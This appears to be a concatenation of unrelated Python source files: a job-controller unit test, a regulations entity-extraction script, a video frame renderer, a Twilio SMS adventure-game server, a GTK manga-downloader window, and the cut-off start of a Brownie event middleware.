self.job_controller = ReadOnlyJobController()
self.job = ReadOnlyJob(JobConfig("test_job"))
def test_submit_job(self):
job_runtime_env = mock.Mock()
job_execution_info = mock.Mock()
job_runtime_env.job_execution_info = job_execution_info
handle = self.job_controller.submit_job(self.job, job_runtime_env)
self.assertIsInstance(handle, ReadOnlyJobHandle)
self.assertEqual(self.job, handle.job)
self.assertEqual(job_execution_info, handle.job_execution)
def test_stop_job(self):
job_runtime_env = mock.Mock()
job_execution_info = mock.Mock()
job_runtime_env.job_execution_info = job_execution_info
with self.assertRaises(RuntimeError):
self.job_controller.stop_job(ReadOnlyJobHandle(mock.Mock(), job_execution_info), job_runtime_env)
handle = self.job_controller.submit_job(self.job, job_runtime_env)
self.assertFalse(self.job_controller._job_stop_events[handle.job].is_set())
self.job_controller.stop_job(handle, job_runtime_env)
self.assertTrue(self.job_controller._job_stop_events[handle.job].is_set())
def test_get_result(self):
job_runtime_env = mock.Mock()
job_execution_info = mock.Mock()
job_runtime_env.job_execution_info = job_execution_info
with self.assertRaises(RuntimeError):
self.job_controller.get_result(ReadOnlyJobHandle(mock.Mock(), job_execution_info), job_runtime_env)
handle = self.job_controller.submit_job(self.job, job_runtime_env)
self.assertIsNone(self.job_controller.get_result(handle, False))
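# get_result(handle, True) blocks until the job is stopped, so stop the job
# from the main thread after a short delay.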
def get_result():
result = self.job_controller.get_result(handle, True)
self.assertIsNone(result)
self.assertTrue(self.job_controller._job_stop_events[handle.job].is_set())
t = Thread(target=get_result)
t.start()
time.sleep(0.5)
self.job_controller.stop_job(handle, job_runtime_env)
t.join()
def test_get_job_status(self):
job_runtime_env = mock.Mock()
job_execution_info = mock.Mock()
job_runtime_env.job_execution_info = job_execution_info
with self.assertRaises(RuntimeError):
self.job_controller.get_job_status(ReadOnlyJobHandle(mock.Mock(), job_execution_info))
handle = self.job_controller.submit_job(self.job, job_runtime_env)
self.assertEqual(Status.RUNNING, self.job_controller.get_job_status(handle))
def test_obtain_job_label(self):
job_runtime_env = mock.Mock()
job_execution_info = mock.Mock()
job_runtime_env.job_execution_info = job_execution_info
with self.assertRaises(RuntimeError):
self.job_controller.obtain_job_label(ReadOnlyJobHandle(mock.Mock(), job_execution_info))
handle = self.job_controller.submit_job(self.job, job_runtime_env)
self.assertEqual("", self.job_controller.obtain_job_label(handle))
def test_obtain_job_label_check_job_type(self):
job_runtime_env = mock.Mock()
job_execution_info = mock.Mock()
job_runtime_env.job_execution_info = job_execution_info
job = Job(mock.Mock())
handle = self.job_controller.submit_job(job, job_runtime_env)
with self.assertRaises(TypeError):
self.job_controller.obtain_job_label(handle)
|
match_text.py
|
GEVENT = False
import zlib
import datetime
import settings
import pymongo
import traceback
import os
import re
import multiprocessing
from Queue import Empty
from regs_models import *
from oxtail.matching import match
# arguments
from optparse import OptionParser
arg_parser = OptionParser()
arg_parser.add_option("-a", "--agency", dest="agency", action="store", type="string", default=None, help="Specify an agency to which to limit the dump.")
arg_parser.add_option("-d", "--docket", dest="docket", action="store", type="string", default=None, help="Specify a docket to which to limit the dump.")
arg_parser.add_option("-A", "--all", dest="process_all", action="store_true", default=False, help="Force a re-extraction of all documents in the system.")
arg_parser.add_option("-m", "--multi", dest="multi", action="store", type="int", default=multiprocessing.cpu_count(), help="Set number of worker processes. Defaults to number of cores if not specified.")
# regex to find titles that are likely to have submitter names
NAME_FINDER = re.compile(r"^(public )?(comment|submission)s? (by|from) (?P<name>.*)$", re.I)
def get_text(view):
if not view.content:
return ''
return view.content.read()
def process_doc(doc):
# entity extraction
for view in doc.views:
if view.extracted == 'yes':
view_matches = match(get_text(view), multiple=True)
view.entities = list(view_matches.keys()) if view_matches else []
for attachment in doc.attachments:
for view in attachment.views:
if view.extracted == 'yes':
view_matches = match(get_text(view), multiple=True)
view.entities = list(view_matches.keys()) if view_matches else []
# submitter matches
# check if there's submitter stuff in the title
title_match = NAME_FINDER.match(doc.title)
# next check details, which is where most title stuff lives
details = doc.details
# stick "XXXX" between tokens because it doesn't occur in entity names
submitter_matches = match(' XXXX '.join([
# organization
details.get('Organization_Name', ''),
# submitter name
' '.join(
filter(bool, [details.get('First_Name', ''), details.get('Last_Name', '')])
),
# submitter representative
details.get('Submitter_s_Representative', ''),
# title_match if we found one
title_match.groupdict()['name'] if title_match else '',
# just examine the whole title if it's from SEC or CFTC; the title is basically always submitter info
doc.title if doc.source == 'sec_cftc' and doc.type in ('public_submission', 'other') else ''
]))
doc.submitter_entities = list(submitter_matches.keys()) if submitter_matches else []
doc.entities_last_extracted = datetime.datetime.now()
doc.save()
return True
def process_worker(todo_queue):
pid = os.getpid()
print '[%s] Worker started.' % pid
while True:
try:
doc = Doc._from_son(todo_queue.get())
except Empty:
print '[%s] Processing complete.' % pid
return
try:
doc_success = process_doc(doc)
print '[%s] Processing of doc %s succeeded.' % (pid, doc.id)
except:
print '[%s] Processing of doc %s failed.' % (pid, doc.id)
traceback.print_exc()
todo_queue.task_done()
def run(options, args):
from regs_common.entities import load_trie_from_mongo
import time
pid = os.getpid()
# load trie from the mongo database
import_start = time.time()
print '[%s] Loading trie...' % pid
load_trie_from_mongo()
print '[%s] Loaded trie in %s seconds.' % (pid, time.time() - import_start)
query = {'deleted': False, 'scraped': 'yes', '$nor': [{'views.extracted': 'no'},{'attachments.views.extracted':'no'}]}
if options.agency:
query['agency'] = options.agency
if options.docket:
query['docket_id'] = options.docket
if not options.process_all:
query['entities_last_extracted'] = {'$exists': False}
cursor = Doc.objects(__raw__=query)
run_start = time.time()
print '[%s] Starting analysis...' % pid
num_workers = options.multi
todo_queue = multiprocessing.JoinableQueue(num_workers * 3)
processes = []
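# Spawn the worker processes that pull documents off the shared queue.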
for i in range(num_workers):
proc = multiprocessing.Process(target=process_worker, args=(todo_queue,))
proc.start()
processes.append(proc)
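# Feed documents to the workers; the bounded JoinableQueue provides
# backpressure so the cursor is not drained all at once.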
for doc in cursor:
todo_queue.put(doc.to_mongo())
todo_queue.join()
for proc in processes:
print 'Terminating worker %s...' % proc.pid
proc.terminate()
print '[%s] Completed analysis in %s seconds.' % (pid, time.time() - run_start)
|
CreateFrames.py
|
import ctypes
import time
import cv2
from multiprocessing import Process, Pipe
from multiprocessing.sharedctypes import RawArray
from osr2mp4 import logger
from osr2mp4.VideoProcess.Draw import draw_frame, Drawer
from osr2mp4.VideoProcess.FrameWriter import write_frame, getwriter
import os
def update_progress(framecount, deltatime, videotime):
pass
def create_frame(settings, beatmap, replay_info, resultinfo, videotime, showranking):
logger.debug('entering preparedframes')
if settings.process >= 1:
shared_array = []
shared_pipe = []
drawers = []
writers = []
start_index, end_index = videotime
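# Split the frame range evenly across the worker processes; the last
# process picks up any remainder.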
osr_interval = int((end_index - start_index) / settings.process)
start = start_index
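# listvideo.txt collects the per-process output segments in ffmpeg
# concat-list format ("file '...'"), presumably so they can be joined
# into the final video afterwards.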
my_file = open(os.path.join(settings.temp, "listvideo.txt"), "w")
for i in range(settings.process):
if i == settings.process - 1:
end = end_index
else:
end = start + osr_interval
shared = RawArray(ctypes.c_uint8, settings.height * settings.width * 4)
conn1, conn2 = Pipe()
# extract container
_, file_extension = os.path.splitext(settings.output)
f = "output" + str(i) + file_extension
vid = (start, end)
drawer = Process(target=draw_frame, args=(
shared, conn1, beatmap, replay_info, resultinfo, vid, settings, showranking and i == settings.process-1))
writer = Process(target=write_frame, args=(shared, conn2, settings.temp + f, settings, i == settings.process-1))
shared_array.append(shared)
shared_pipe.append((conn1, conn2))
drawers.append(drawer)
writers.append(writer)
my_file.write("file '{}'\n".format(f))
logger.debug("Starting process")
drawer.start()
logger.debug("Start drawer {}".format(i))
writer.start()
logger.debug("Start writer {}".format(i))
start += osr_interval
my_file.close()
return drawers, writers, shared_pipe, shared_array
else:
from osr2mp4.VideoProcess.AFrames import PreparedFrames
from osr2mp4.CheckSystem.mathhelper import getunstablerate
import numpy as np
logger.debug("process start")
ur = getunstablerate(resultinfo)
frames = PreparedFrames(settings, beatmap.diff, replay_info.mod_combination, ur=ur, bg=beatmap.bg, loadranking=showranking)
shared = RawArray(ctypes.c_uint8, settings.height * settings.width * 4)
drawer = Drawer(shared, beatmap, frames, replay_info, resultinfo, videotime, settings)
_, file_extension = os.path.splitext(settings.output)
f = os.path.join(settings.temp, "outputf" + file_extension)
buf = np.zeros((settings.height * settings.width * 3), dtype=np.uint8)
writer = getwriter(f, settings, buf)
buf = buf.reshape((settings.height, settings.width, 3))
logger.debug("setup done")
framecount = 0
startwritetime = time.time()
while drawer.frame_info.osr_index < videotime[1]:
status = drawer.render_draw()
if status:
cv2.cvtColor(drawer.np_img, cv2.COLOR_BGRA2RGB, dst=buf)
if not settings.settings["Use FFmpeg video writer"]:
writer.write(buf)
else:
writer.write()
framecount += 1
if framecount % 100 == 0:
filewriter = open(os.path.join(settings.temp, "speed.txt"), "w")
deltatime = time.time() - startwritetime
filewriter.write("{}\n{}\n{}\n{}".format(framecount, deltatime, f, startwritetime))
filewriter.close()
update_progress(framecount, deltatime, videotime)
if showranking:
for x in range(int(5 * settings.fps)):
drawer.draw_rankingpanel()
cv2.cvtColor(drawer.np_img, cv2.COLOR_BGRA2RGB, dst=buf)
if not settings.settings["Use FFmpeg video writer"]:
writer.write(buf)
else:
writer.write()
writer.release()
logger.debug("\nprocess done")
return None, None, None, None
|
server.py
|
from __future__ import print_function
# Copyright (c) 2016-2021 Twilio Inc.
import os
import threading
import time
try: # Python 3
from queue import Queue
except ImportError: # Python 2
from Queue import Queue
import psycopg2
dburl = os.getenv('DATABASE_URL')
if not dburl:
dburl = 'dbname=test user=cswenson'
conn = psycopg2.connect(dburl)
cur = conn.cursor()
try:
cur.execute("""
CREATE TABLE IF NOT EXISTS adventure (
num VARCHAR(32) PRIMARY KEY,
state BYTEA,
created TIMESTAMP WITH TIME ZONE DEFAULT NOW(),
modified TIMESTAMP WITH TIME ZONE DEFAULT NOW());
""")
conn.commit()
except Exception:
pass
cur.close()
from twilio import twiml
from flask import Flask, request, jsonify, Request
from werkzeug.datastructures import ImmutableOrderedMultiDict
from interpret import Game
class MyRequest(Request):
"""Request subclass to override request parameter storage"""
parameter_storage_class = ImmutableOrderedMultiDict
class MyFlask(Flask):
"""Flask subclass using the custom request class"""
request_class = MyRequest
app = MyFlask(__name__)
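# TwilioHandler bridges the web request and the game thread: the game blocks on read()
# (inqueue) for player input and emits its output through write() (outqueue), which
# run_for() drains once per incoming message.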
class TwilioHandler(object):
def __init__(self):
self.outqueue = Queue()
self.inqueue = Queue()
def read(self):
return self.inqueue.get()
def write(self, data):
self.outqueue.put(data)
sid = os.getenv('TWILIO_SID')
token = os.getenv('TWILIO_TOKEN')
from_num = os.getenv('TWILIO_NUMBER')
states = {}
def run_for(from_, inp):
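    # Drive one game turn for this phone number: load or spin up the game thread, feed it
    # the input, collect the reply text, and persist the serialized game state to Postgres.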
try:
cur = conn.cursor()
inp = str(inp).upper().strip()
inp = inp[:20] # commands shouldn't be longer than this
cur.execute("SELECT state FROM adventure WHERE num = %s", (from_,))
row = cur.fetchone()
exists = row is not None
ignore_input = False
new_game = False
if inp in ('RESET', 'QUIT', 'PURGE'):
if from_ in states:
del states[from_]
exists = False # force a reset
cur.execute("DELETE FROM adventure WHERE num = %s", (from_,))
elif inp == 'PURGE':
resp = twiml.Response()
text = 'Your data has been purged from the database. Text back to start a new game in the future if you like.'
resp.message(text)
return str(resp)
if not exists:
print('starting new game for', from_)
handler = TwilioHandler()
game = Game(handler)
t = threading.Thread(target=game.go)
t.daemon = True
t.start()
states[from_] = [handler, game, t]
ignore_input = True
new_game = True
if exists and from_ not in states:
# load from backup
handler = TwilioHandler()
game = Game(handler)
t = threading.Thread(target=game.go)
t.daemon = True
t.start()
states[from_] = [handler, game, t]
# wait for it to boot
while not game.waiting():
time.sleep(0.001)
# empty the queues
while not handler.outqueue.empty():
handler.outqueue.get_nowait()
game.setstate(row[0])
states[from_] = [handler, game, t]
handler, game, _ = states[from_]
if not ignore_input:
handler.inqueue.put(inp)
time.sleep(0.001)
while not game.waiting():
time.sleep(0.001)
text = ''
while not text:
while not handler.outqueue.empty():
text += handler.outqueue.get()
time.sleep(0.001)
# now save the game state to the database
state = game.getstate()
if exists:
cur.execute("UPDATE adventure SET state = %s, modified = NOW() WHERE num = %s", (psycopg2.Binary(state), from_))
else:
cur.execute("INSERT INTO adventure (num, state) VALUES (%s,%s)", (from_, psycopg2.Binary(state)))
conn.commit()
if new_game:
text = 'Welcome to Adventure! Type RESET or QUIT to restart the game. Type PURGE to be removed from our database.\n\n' + text
return text
finally:
cur.close()
@app.route("/incoming-voice", methods=['GET', 'POST'])
def voice_reply():
print('Form', request.form)
from_ = request.form['DialogueSid'][2:34]
inp = ''
if 'Field_word1_Value' in request.form:
inp += ' ' + request.form.getlist('Field_word1_Value')[-1]
if 'Field_word2_Value' in request.form and len((request.values.get('CurrentInput') or '').split(' ')) > 1:
inp += ' ' + request.form.getlist('Field_word2_Value')[-1]
inp = inp.strip()[:20]
if inp == '':
inp = request.values.get('CurrentInput') or ''
inp = inp.strip().upper().replace('.', '').replace(',', '')
inp = str(inp)
print('Recognized input %s' % inp)
text = run_for(from_, inp)
print('Output %s' % text)
actions = []
if inp:
text = 'I heard ' + inp + '. ' + text
actions.append({'say': {'speech': text}})
actions.append({'listen': True})
resp = {'actions': actions}
return jsonify(resp)
@app.route("/incoming-sms", methods=['GET', 'POST'])
def sms_reply():
from_ = str(request.values.get('From'))
inp = str(request.values.get('Body', ''))
text = run_for(from_, inp)
resp = twiml.Response()
resp.message(text)
return str(resp)
@app.route('/')
def hello_world():
return 'Hello, World!'
|
MainWindow.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
#===============================================================================#
#title :MainWindow.py #
#description :Defines the MainWidow for gtk. #
#author :August B. Sandoval (asandova) #
#date :2020-3-2 #
#version :0.3 #
#usage :defines a custom gkt window #
#notes : #
#python_version :3.6.9 #
#===============================================================================#
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk as gtk,GLib as glib, GObject
GObject.threads_init()
glib.threads_init()
import os, shutil, threading, re, sys, traceback
from src.controller import control
from src.MangaPark import MangaPark_Source
from src.TitleSource import TitleSource
from gtk3.ChapterListRow import ChapterListBoxRow
from gtk3.TitleListBoxRow import TitleListBoxRow
from gtk3.Viewer import Viewer
from gtk3.GUI_Popups import Error_Popup, Warning_Popup, Info_Popup, add_Popup, About_Popup, ask_Popup
class MainWindow(control, gtk.Window):
def __init__(self, UI_Main, UI_Viewer, UI_Add_Dialog, *args, **kwargs):
gtk.Window.__init__(self, *args, **kwargs)
control.__init__(self)
self.__spinner_status = False
self.builder = gtk.Builder()
self.builder.add_from_file(UI_Main+".glade")
self.About = None
self.entered_url = None
self.UI_Viewer = UI_Viewer
self.UI_Add = UI_Add_Dialog
self.Widgets["Main Window"] = self.builder.get_object("Main_Window")
self.Widgets["Chapter Viewer"] = None
self.Widgets["Info Viewer"] = self.builder.get_object("Manga_info_viewer")
self.Widgets["Status Spinner"] = self.builder.get_object("Status_Spinner")
self.Widgets["Status Label"] = self.builder.get_object("Status_Label")
self.Widgets["Title Label"] = self.builder.get_object("Manga_Title_Label" )
self.Widgets["Authors Label"] = self.builder.get_object("Manga_Author_Label")
self.Widgets["Artists Label"] = self.builder.get_object("Manga_Artist_label")
self.Widgets["Genre Label"] = self.builder.get_object("Manga_Genre_Label")
self.Widgets["Summary Label"] = self.builder.get_object("Summary_Data_Label")
self.Widgets["Stream Select"] = self.builder.get_object("Stream_Combo_Box")
self.Widgets["Cover"] = self.builder.get_object("Manga_Cover_Image")
self.Widgets["Chapter List Box"] = self.builder.get_object("Chapter_List")
self.Widgets["Title List"] = self.builder.get_object("Manga_List")
self.Widgets["Search Box"] = self.builder.get_object("Manga_Title_Search")
self.Widgets["Update Streams"] = self.builder.get_object("Update_Streams_Button")
self.Widgets["About"] = self.builder.get_object("About_Menu_Button")
self.Widgets["Link"] = self.builder.get_object("Manga_Link")
self.Widgets["Chapter Sort"] = self.builder.get_object("Sort_Toggle")
self.Widgets["Sort Image"] = self.builder.get_object("sort_button_image")
self.Widgets["Download all chapters Button"] = self.builder.get_object("download_all_button")
self.Widgets["Add Title"] = self.builder.get_object("Add_Manga_Menu_Button")
self.Widgets["Title Buttons"] = {}
self.Widgets["Main Window"].connect("delete-event", self._on_quit)
self.Widgets["Add Title"].connect("activate",self._on_menu_add)
self.Widgets["Update Streams"].connect("clicked",self._on_update)
self.Widgets["Download all chapters Button"].set_sensitive(True)
self.Widgets["Download all chapters Button"].set_tooltip_text("Download all chapters in current stream list")
self.Widgets["Download all chapters Button"].connect("clicked", self._on_download_all)
self.Widgets["Search Box"].connect("search-changed",self._on_search_change)
self.Widgets["Stream Select"].connect("changed",self._on_stream_change)
self.Widgets["Title List"].connect("row_selected",self._on_list_select)
self.Widgets["Title List"].connect("selected-rows-changed",self._on_list_select)
self.Widgets["About"].connect("activate", self.about)
self.Widgets["Chapter Sort"].connect("clicked", self._on_sort)
self.Widgets["Sort Image"].set_from_icon_name("gtk-sort-descending", 1)
self.Widgets["Chapter Sort"].set_tooltip_text("set to descending order")
self.Widgets["Main Window"].show()
self._get_title_list_from_file()
self._load_title_entry()
def add_title_entry(self,name):
row = TitleListBoxRow(name)
row.show()
self.Widgets["Title Buttons"][row] = name
index = self._find_insertion_point(name)
row.connect("remove_row", self._on_remove)
self.Widgets["Title List"].insert(row, index)
if self.Widgets["Title List"].props.visible == False:
self.Widgets["Title List"].show()
def title_exist(self, name):
for t in self.Title_Dict.keys():
if t == name:
return True
return False
def update_status(self, turn_on, message=None):
if turn_on == True and self.__spinner_status == False:
self.__spinner_status = True
self.Widgets["Status Spinner"].start()
elif turn_on == False and self.__spinner_status == True:
self.__spinner_status = False
self.Widgets["Status Spinner"].stop()
if message != None:
self.Widgets["Status Label"].set_label(message)
def _find_insertion_point(self, title):
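        # Keep the title list alphabetical: sort the existing names together with the new
        # one and return the index where the new name ends up.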
rows = list(self.Widgets["Title Buttons"].values())
rows.append(title)
rows.sort()
for i in range(0,len(rows)):
if rows[i] == title:
return i
def _is_chapter_visable(self, title, stream, chapter ):
chapter_hash = hash( (title, stream, chapter) )
for i in range(0, len(self.Chapter_List) ):
if chapter_hash == hash(self.Chapter_List[i]):
return self.Chapter_List[i]
return None
def _load_title_entry(self):
self.update_status(True, "Loading Title List.....")
for m in self.Title_Dict.keys():
self.add_title_entry(m)
self.Widgets["Title List"].show()
self.update_status(False,"Loaded Title List")
def _on_remove_chapter(self, chapter_row):
print(chapter_row.is_downloaded())
if chapter_row.is_downloaded() == True:
print(chapter_row.chapter_path+'/'+chapter_row.chapter.directory+ '.zip')
if os.path.isfile(chapter_row.chapter_path+'/'+chapter_row.chapter.directory+ '.zip') == True:
os.remove(chapter_row.chapter_path+'/'+chapter_row.chapter.directory+ '.zip')
chapter_row.update_state("download", "Download", "Download " + str(chapter_row.chapter), True)
chapter_row.update_state("remove", "Remove","Chapter " + str(chapter_row.chapter)+ " is not downloaded")
chapter_row.update_state("view", "View", "Download " + str(chapter_row.chapter) + " before viewing")
chapter_row.set_is_downloaded(False)
def _on_sort(self, widget):
self._sort = not self._sort
if self._sort == True:
self.Widgets["Chapter Sort"].set_tooltip_text("set to descending order")
self.Widgets["Sort Image"].set_from_icon_name("gtk-sort-descending",1)
else:
self.Widgets["Sort Image"].set_from_icon_name("gtk-sort-ascending",1)
self.Widgets["Chapter Sort"].set_tooltip_text("set to ascending order")
self._update_chapter_list()
def _on_update(self, widget):
status = self._check_all_selections()
if status <= 2:
self.update_status(True,"Updating : " + self.selection["Title"].get_title())
updater = threading.Thread( target=self._update_runner, args=(self.selection["Title"],) )
updater.daemon = True
updater.start()
else:
popup = Warning_Popup(self,"No Stream Selected")
popup.run()
popup.destroy()
def _update_title_details(self):
if self.selection["Title"] != None:
self.Widgets["Cover"].clear()
if os.path.isfile(self.selection["Title"].get_cover_location()) == False:
self.Widgets["Cover"].set_from_icon_name("gtk-missing-image", 30)
else:
self.Widgets["Cover"].set_from_file(self.selection["Title"].get_cover_location())
self.Widgets["Title Label"].set_label(self.selection["Title"].get_title())
self.Widgets["Authors Label"].set_label( "Author(s): " + self.selection["Title"].get_Authors_str())
self.Widgets["Artists Label"].set_label("Artist(s): " + self.selection["Title"].get_Artists_str())
self.Widgets["Genre Label"].set_label("Genre(s): " + self.selection["Title"].get_Genres_str())
self.Widgets["Summary Label"].set_label(self.selection["Title"].get_summary())
self.Widgets["Link"].set_uri(self.selection["Title"].site_url)
self.Widgets["Link"].set_label("Visit Site")
if( self.Widgets["Info Viewer"].props.visible == False ):
self.Widgets["Info Viewer"].show()
else:
self.Widgets["Info Viewer"].hide()
def _check_all_selections(self):
if self.selection["Title"] != None:
if self.selection["Stream"] != None:
if self.selection["Chapter"] != None:
return 0
else:
return 1 # no chapter selected
else:
return 2 # no stream selected
else:
return 3 # no Title selected
# Signal callback methods ---------------------------------------------------------------#
def about(self, widget):
self.About = About_Popup(self)
def _on_download(self, title, stream, chapter, location):
id = hash( (title, stream, chapter) )
if self.in_chapter_queue( id ) == False:
self.ChapterQueue.appendleft( (title, stream, chapter, location, id) )
if self.threads["Chapter"] == None:
self.threads["Chapter"] = threading.Thread( target=self._download_chapter_runner )
self.threads["Chapter"].start()
else:
self.update_status( True, "Downloading " + title.get_title() + " Chapter " + str(chapter.get_chapter_number()) + "\nChapters Queued " + str( len(self.ChapterQueue) ) )
def _on_download_all(self, widget):
for c in self.selection["Stream"].get_chapters():
path = self.selection["Title"].save_location + "/" + self.selection["Title"].get_directory() +'/'+ self.selection["Stream"].get_directory()
if c.is_downloaded(path) == False:
self._on_download( self.selection["Title"],self.selection["Stream"], c, path )
self._update_chapter_list()
def _on_menu_add(self, widget):
Entry_popup = add_Popup(self, self.UI_Add )
response = Entry_popup.run()
if response == gtk.ResponseType.OK:
pattern = re.compile(r"\s")
self.entered_url = re.subn(pattern,"", self.entered_url)[0]
urls = self.entered_url.split(',')
for u in urls:
if u == "" or u == None:
error = Error_Popup(self,"Invalid","Invalid site domain")
error.run()
error.destroy()
else:
domain = TitleSource.find_site_domain( u )
if domain == 'mangapark.net' or domain == 'www.mangapark.net':
title = MangaPark_Source()
self.TitleQueue.appendleft( (title, u) )
if self.threads["Title"] == None:
self.threads["Title"] = threading.Thread(target=self._add_title_from_url_runner)
self.threads["Title"].start()
elif domain == None:
error = Error_Popup(self,"Invalid","Invalid site domain")
error.run()
error.destroy()
else:
error = Error_Popup(self,"Unsupported Manga Site", domain + " is currently not supported")
error.run()
error.destroy()
elif response == gtk.ResponseType.CANCEL:
self.entered_url = ""
Entry_popup.destroy()
def _on_quit(self, widget, data):
if self.threads["Chapter"] != None or self.threads["Stream"] != None or self.threads["Title"] != None:
popup = ask_Popup(self, "Active Downloads", "Do you wish to stop downloads?")
            response = popup.run()
            popup.destroy()
            if response == gtk.ResponseType.CANCEL:
print("Cancel pressed")
return True
else:
self.update_status(True, "Canceling Downloads")
self._KillThreads = True
if self.threads["Chapter"] != None:
self.threads["Chapter"].join()
if self.threads["Stream"] != None:
self.threads["Stream"].join()
if self.threads["Title"] != None:
self.threads["Title"].join()
self._export_title_list_to_file()
self.update_status(False)
gtk.main_quit()
else:
self.update_status(True, "exporting Title List")
self._export_title_list_to_file()
self.update_status(False)
gtk.main_quit()
def _on_list_select(self, widget, data=None):
if data != None:
data = widget.get_selected_row()
self.selection["Title"] = self.Title_Dict[ self.Widgets["Title Buttons"][data] ]
self.selection["Stream"] = None
self._update_title_details()
self._update_stream_dropdown()
def _on_remove(self, widget, data):
key = self.Widgets["Title Buttons"][data]
del self.Widgets["Title Buttons"][data]
self.Widgets["Title List"].remove(data)
manga_to_delete = self.Title_Dict[key]
location = manga_to_delete.save_location +'/' + manga_to_delete.directory
if os.path.isdir(location) == True:
shutil.rmtree(location)
del self.Title_Dict[key]
if manga_to_delete == self.selection["Title"]:
self.selection["Title"] = None
self._update_title_details()
def _on_search_change(self, widget):
text = widget.get_text()
if text == "":
for m in self.Widgets["Title Buttons"]:
m.show()
else:
text = text.lower()
pattern = re.compile( '(' + text + ')' )
for m in self.Widgets["Title Buttons"]:
if re.search(pattern,m.get_text().lower()) != None:
m.show()
else:
m.hide()
def _on_stream_change(self, widget):
self.selection["Stream"] = self.selection["Title"].get_stream_with_name(widget.get_active_text())
if self.selection["Stream"] == None:
entry = self.Widgets["Stream Select"].get_child()
entry.set_text("")
self._update_chapter_list()
def _on_view(self, number, location):
self.selection["Chapter"] = self.selection["Stream"].get_chapter(number)
v = Viewer.get_instance( self.selection["Title"], self.selection["Stream"], self.selection["Chapter"] )
if v != None:
popup = Info_Popup(self,"Viewer open","A viewer for this chapter is already open")
popup.run()
popup.destroy()
else:
Viewer(self,self.UI_Viewer,self.selection["Title"], self.selection["Stream"], self.selection["Chapter"],location)
def _update_chapter_list(self):
if self.selection["Stream"] != None:
if len(self.Chapter_List) > 0:
for r in self.Chapter_List:
self.Widgets["Chapter List Box"].remove(r)
self.Chapter_List = []
chapters = self.selection["Stream"].get_chapters()
if self._sort == True :
chapters.sort(reverse=True)
else:
chapters.sort(reverse=False)
for i in range(0, len(chapters)):
row = ChapterListBoxRow(self,
self.selection["Title"],
self.selection["Stream"],
chapters[i],
downloadCommand=self._on_download,
removeCommand= self._on_remove_chapter,
viewCommand=self._on_view
)
self.Chapter_List.append(row)
self.Widgets["Chapter List Box"].insert(row, i)
else:
if len(self.Chapter_List) > 0:
for r in self.Chapter_List:
self.Widgets["Chapter List Box"].remove(r)
self.Chapter_List = []
def _update_stream_dropdown(self):
if self.selection["Title"] != None:
self.Widgets["Stream Select"].remove_all()
for s in self.selection["Title"].get_streams():
self.Widgets["Stream Select"].append_text(s.get_name())
# Thread worker methods -----------------------------------------------------------------#
def _add_title_from_url_runner( self):
while len( self.TitleQueue ) > 0:
if self._KillThreads == True:
return
self._current_task["Title"] = self.TitleQueue.pop()
title = self._current_task["Title"][0]
url = self._current_task["Title"][1]
glib.idle_add(self.update_status, True , "Fetching title from " + url)
code = title.request_manga(url)
if code != 0:
error = Error_Popup(self, "Failed to Connect", "HTML Error " + str(code))
error.run()
error.destroy()
else:
try:
glib.idle_add(self.update_status, True , "Extracting : " + url)
title.extract_manga()
glib.idle_add(self.update_status,False, "Extraction Complete")
if self.title_exist(title.get_title() ) == False:
self.add_title_entry(title.get_title())
self.Title_Dict[title.get_title()] = title
title.to_json_file(title.save_location)
                        glib.idle_add(self.update_status, False, "Successfully added: " + title.get_title())
else:
glib.idle_add(self.update_status, False, title.get_title() + " already exists")
except:
glib.idle_add(self.update_status, False, "Failed to extract title from url: " + url)
self.threads["Title"] = None
self._current_task["Title"] = None
def _download_chapter_runner(self):
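        # Worker thread: drains the chapter queue one download at a time; every widget
        # update is marshalled back to the GTK main loop via GObject.idle_add.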
while len(self.ChapterQueue) > 0:
if self._KillThreads == True:
return
self._current_task["Chapter"] = self.ChapterQueue.pop()
title = self._current_task["Chapter"][0]
stream = self._current_task["Chapter"][1]
chapter = self._current_task["Chapter"][2]
row = self._is_chapter_visable( title, stream, chapter )
if row != None:
GObject.idle_add( row.update_state,"download", "Downloading...", "Chapter is downloading", False, True )
GObject.idle_add( self.update_status, True,"Downloading " + title.get_title() + " Chapter " + str(chapter.get_chapter_number()) + "\nChapters Queued " + str( len(self.ChapterQueue) ) )
code = title.Download_Manga_Chapter( stream.get_id(),chapter.get_chapter_number(), self._current_task["Chapter"][3], self._KillThreads )
row = self._is_chapter_visable( title, stream, chapter )
if code != 0:
GObject.idle_add(self.update_status,False, "Failed to download:\n" + str(chapter) )
if row != None:
GObject.idle_add(row.update_state,"download","Download", True, False)
else:
self.update_status(False, "Download of " + title.get_title() + "\n" + str(chapter) + " --- Completed")
if row != None:
GObject.idle_add(row.update_state,"download", "Downloaded","Chapter "+ str(chapter.get_chapter_number()) + " is already downloaded",False, False)
GObject.idle_add(row.update_state,"view", "view", "View chapter "+ str(chapter.get_chapter_number()),True, False)
GObject.idle_add(row.update_state,"remove", "Remove","remove chapter "+ str(chapter.get_chapter_number()) + " from local storage?",True, False)
self._current_task["Chapter"] = None
self.threads["Chapter"] = None
def _update_runner( self, title ):
GObject.idle_add( self.update_status, True, "Updating : " + self.selection["Title"].get_title())
try:
status = title.update_streams()
if status == 0:
print("Status " + str(status))
GObject.idle_add( self._update_chapter_list)
GObject.idle_add( self.update_status, False, "Updated : " + self.selection["Title"].get_title())
title.to_json_file(title.save_location)
else:
popup = Error_Popup(self,"Update Error", "Site returned error " + str(status))
popup.run()
popup.destroy()
except Exception as e:
traceback.print_exc(file=sys.stdout)
            print("Error occurred: " + str(e))
self.threads["Stream"] = None
|
event_subscribe.py
|
from typing import Callable, Dict, List, Optional
from collections import OrderedDict
import threading
import time
import json
from wpath import *
from hexbytes import HexBytes
from web3 import Web3
from web3.exceptions import (
InvalidEventABI,
LogTopicError,
MismatchedABI,
)
from brownie.network.middlewares import BrownieMiddlewareABC
from brownie import project
from brownie._config import CONFIG
from web3._utils.events import get_event_data
def get_contract_by_address(active_project, address):
for contract_name in active_project.keys():
contracts = active_project.dict()[contract_name]
for contract in contracts:
if contract.address == address:
return contract
return None
request_duty = 6
message_event_abi = {
"anonymous": False,
"inputs": [
{
"indexed": False,
"internalType": "string",
"name": "msg",
"type": "string",
}
],
"name": "Message",
"type": "event",
}
def parse_log(
w3,
log,
):
codec = w3.codec
try:
evt = get_event_data(codec, message_event_abi, log)
print(f'\n{color_y("console.log:")} {color_r(str(evt["args"]["msg"]))}')
except MismatchedABI:
pass
except Exception as e:
print_m(type(e))
print_r(f"error:{e}")
class EventSubscribeMiddleware(BrownieMiddlewareABC):
def __init__(self, w3: Web3) -> None:
self.w3 = w3
latest = w3.eth.get_block("latest")
